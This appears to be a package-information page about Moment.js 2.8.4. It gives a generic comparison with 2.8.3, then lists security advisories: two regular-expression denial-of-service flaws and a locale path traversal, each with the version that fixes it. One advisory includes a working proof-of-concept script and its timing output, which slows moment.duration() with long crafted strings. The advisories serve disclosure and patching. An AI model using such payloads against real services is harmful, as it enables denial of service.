Moment.js version 2.8.4 is a minor update to the popular JavaScript date manipulation library, following version 2.8.3. Both versions retain the core functionalities that make Moment.js a developer favorite: parsing, validating, manipulating, and formatting dates and times. They share identical descriptions, development dependencies, repository information, and author details, indicating a focus on stability and incremental improvement. Developers familiar with 2.8.3 will find a seamless transition to 2.8.4.
The critical difference lies in the releaseDate. Version 2.8.4 was released on November 19, 2014, whereas 2.8.3 arrived on September 5, 2014. This two-month gap suggests bug fixes or enhancements incorporated into 2.8.4. While the specific changes aren't detailed in the provided metadata, developers reliant on precise date handling should prioritize the newer version to benefit from potential stability improvements and edge-case resolutions. The shared dependency list, including testing and building tools (Grunt, Karma, Nodeunit), underscores the project's commitment to quality and consistent development practices across versions. Users initiating new projects should opt for 2.8.4 as the more recent stable release. Existing users might consider upgrading after reviewing the detailed changelog (available on the Moment.js website or GitHub repository) to ascertain whether the changes address specific needs or potential issues encountered in their applications.
All the vulnerabilities related to the version 2.8.4 of the package
Regular Expression Denial of Service in moment
Versions of moment prior to 2.11.2 are affected by a regular expression denial of service vulnerability. The vulnerability is triggered when arbitrary user input is passed into moment.duration().
var moment = require('moment');
var genstr = function (len, chr) {
var result = "";
for (i=0; i<=len; i++) {
result = result + chr;
}
return result;
}
for (i=20000;i<=10000000;i=i+10000) {
console.log("COUNT: " + i);
var str = '-' + genstr(i, '1')
console.log("LENGTH: " + str.length);
var start = process.hrtime();
moment.duration(str)
var end = process.hrtime(start);
console.log(end);
}
$ node moment.js
COUNT: 20000
LENGTH: 20002
[ 0, 618931029 ]
COUNT: 30001
LENGTH: 30003
[ 1, 401413894 ]
COUNT: 40002
LENGTH: 40004
[ 2, 437075303 ]
COUNT: 50003
LENGTH: 50005
[ 3, 824664804 ]
COUNT: 60004
LENGTH: 60006
[ 5, 651335262 ]
Please update to version 2.11.2 or later.
Regular Expression Denial of Service in moment
Affected versions of moment are vulnerable to a low severity regular expression denial of service when parsing dates as strings.
Update to version 2.19.3 or later.
Path Traversal: 'dir/../../filename' in moment.locale
This vulnerability impacts npm (server) users of moment.js, especially if user provided locale string, eg fr is directly used to switch moment locale.
This problem is patched in 2.29.2, and the patch can be applied to all affected versions (from 1.0.1 up until 2.29.1, inclusive).
Sanitize user-provided locale name before passing it to moment.js.
Are there any links users can visit to find out more?
If you have any questions or comments about this advisory: